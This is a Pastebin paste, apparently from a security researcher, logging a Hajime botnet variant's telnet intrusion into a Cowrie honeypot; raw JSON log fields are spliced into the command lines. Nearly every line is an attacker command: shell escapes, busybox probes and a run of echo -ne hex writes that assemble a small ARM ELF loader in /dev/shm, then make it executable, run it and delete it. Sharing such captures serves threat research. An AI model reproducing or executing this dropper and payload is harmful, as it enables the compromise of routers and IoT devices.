API tools faq
paste
Advertisement
bontchev

Session log from a new Hajime variant

bontchev
Mar 5th, 2017
287
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.57 KB | None | 0 0
raw download clone embed print report
  1. enable
  2. shell
  3. sh
  4. cat /proc/mounts; /bin/busybox PQLUR
  5. cd /dev/shm; (cat .s || cp /bin/echo .s); /bin/busybox PQLUR
  6. nc; wget; /bin/busybox PQLUR
  7. (dd bs=52 count=1 if=.s || cat .s)
  8. /bin/busybox PQLUR
  9. >.s; cp .s .i
  10. echo -ne \"\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x61\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x28\\x00\\x01\\x00\\x00\\x00\\x74\\x80\\x00\\x00\\x34\\x00\\x00\\x00\\x2c\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x01\\x00\\x28\\x00\\x03\\x00\\x02\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x00\\x00\" >> .s", "system": "CowrieTelnetTransport,1016,211.227.21.213", "isError": 0, "src_ip": "211.227.21.213", "session": "45e3a7b4", "input": "echo -ne \"\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x61\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x28\\x00\\x01\\x00\\x00\\x00\\x74\\x80\\x00\\x00\\x34\\x00\\x00\\x00\\x2c\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x01\\x00\\x28\\x00\\x03\\x00\\x02\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x00\\x00\" >> .s
  11. echo -ne \"\\x00\\x80\\x00\\x00\\x18\\x01\\x00\\x00\\x18\\x01\\x00\\x00\\x05\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\xa0\\xe3\\x01\\x10\\xa0\\xe3\\x06\\x20\\xa0\\xe3\" >> .s", "system": "CowrieTelnetTransport,1016,211.227.21.213", "isError": 0, "src_ip": "211.227.21.213", "session": "45e3a7b4", "input": "echo -ne \"\\x00\\x80\\x00\\x00\\x18\\x01\\x00\\x00\\x18\\x01\\x00\\x00\\x05\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\xa0\\xe3\\x01\\x10\\xa0\\xe3\\x06\\x20\\xa0\\xe3\" >> .s
  12. echo -ne \"\\x07\\x00\\x2d\\xe9\\x01\\x00\\xa0\\xe3\\x0d\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x0c\\xd0\\x8d\\xe2\\x00\\x60\\xa0\\xe1\\x70\\x10\\x8f\\xe2\\x10\\x20\\xa0\\xe3\\x07\\x00\\x2d\\xe9\\x03\\x00\\xa0\\xe3\\x0d\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x14\\xd0\\x8d\\xe2\\x4f\\x4f\\x4d\\xe2\\x05\\x50\\x45\\xe0\\x06\\x00\\xa0\\xe1\" >> .s", "system": "CowrieTelnetTransport,1016,211.227.21.213", "isError": 0, "src_ip": "211.227.21.213", "session": "45e3a7b4", "input": "echo -ne \"\\x07\\x00\\x2d\\xe9\\x01\\x00\\xa0\\xe3\\x0d\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x0c\\xd0\\x8d\\xe2\\x00\\x60\\xa0\\xe1\\x70\\x10\\x8f\\xe2\\x10\\x20\\xa0\\xe3\\x07\\x00\\x2d\\xe9\\x03\\x00\\xa0\\xe3\\x0d\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x14\\xd0\\x8d\\xe2\\x4f\\x4f\\x4d\\xe2\\x05\\x50\\x45\\xe0\\x06\\x00\\xa0\\xe1\" >> .s
  13. echo -ne \"\\x04\\x10\\xa0\\xe1\\x4b\\x2f\\xa0\\xe3\\x01\\x3c\\xa0\\xe3\\x0f\\x00\\x2d\\xe9\\x0a\\x00\\xa0\\xe3\\x0d\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x10\\xd0\\x8d\\xe2\\x00\\x50\\x85\\xe0\\x00\\x00\\x50\\xe3\\x04\\x00\\x00\\xda\\x00\\x20\\xa0\\xe1\\x01\\x00\\xa0\\xe3\\x04\\x10\\xa0\\xe1\\x04\\x00\\x90\\xef\\xee\\xff\\xff\\xea\" >> .s", "system": "CowrieTelnetTransport,1016,211.227.21.213", "isError": 0, "src_ip": "211.227.21.213", "session": "45e3a7b4", "input": "echo -ne \"\\x04\\x10\\xa0\\xe1\\x4b\\x2f\\xa0\\xe3\\x01\\x3c\\xa0\\xe3\\x0f\\x00\\x2d\\xe9\\x0a\\x00\\xa0\\xe3\\x0d\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x10\\xd0\\x8d\\xe2\\x00\\x50\\x85\\xe0\\x00\\x00\\x50\\xe3\\x04\\x00\\x00\\xda\\x00\\x20\\xa0\\xe1\\x01\\x00\\xa0\\xe3\\x04\\x10\\xa0\\xe1\\x04\\x00\\x90\\xef\\xee\\xff\\xff\\xea\" >> .s
  14. echo -ne \"\\x4f\\xdf\\x8d\\xe2\\x00\\x00\\x40\\xe0\\x01\\x70\\xa0\\xe3\\x00\\x00\\x00\\xef\\x02\\x00\\x12\\x1c\\x00\\x00\\x00\\x00\\x00\\x2e\\x73\\x68\\x73\\x74\\x72\\x74\\x61\\x62\\x00\\x2e\\x74\\x65\\x78\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" >> .s", "system": "CowrieTelnetTransport,1016,211.227.21.213", "isError": 0, "src_ip": "211.227.21.213", "session": "45e3a7b4", "input": "echo -ne \"\\x4f\\xdf\\x8d\\xe2\\x00\\x00\\x40\\xe0\\x01\\x70\\xa0\\xe3\\x00\\x00\\x00\\xef\\x02\\x00\\x12\\x1c\\x00\\x00\\x00\\x00\\x00\\x2e\\x73\\x68\\x73\\x74\\x72\\x74\\x61\\x62\\x00\\x2e\\x74\\x65\\x78\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" >> .s
  15. echo -ne \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x74\\x80\\x00\\x00\\x74\\x00\\x00\\x00\\xa4\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\" >> .s", "system": "CowrieTelnetTransport,1016,211.227.21.213", "isError": 0, "src_ip": "211.227.21.213", "session": "45e3a7b4", "input": "echo -ne \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x74\\x80\\x00\\x00\\x74\\x00\\x00\\x00\\xa4\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\" >> .s
  16. echo -ne \"\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x01\\x00\\x00\\x11\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" >> .s", "system": "CowrieTelnetTransport,1016,211.227.21.213", "isError": 0, "src_ip": "211.227.21.213", "session": "45e3a7b4", "input": "echo -ne \"\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x01\\x00\\x00\\x11\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" >> .s", "sensor": "bontchev-notebook"}
  17. ./.s>.i; chmod +x .i; ./.i; rm .s; exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!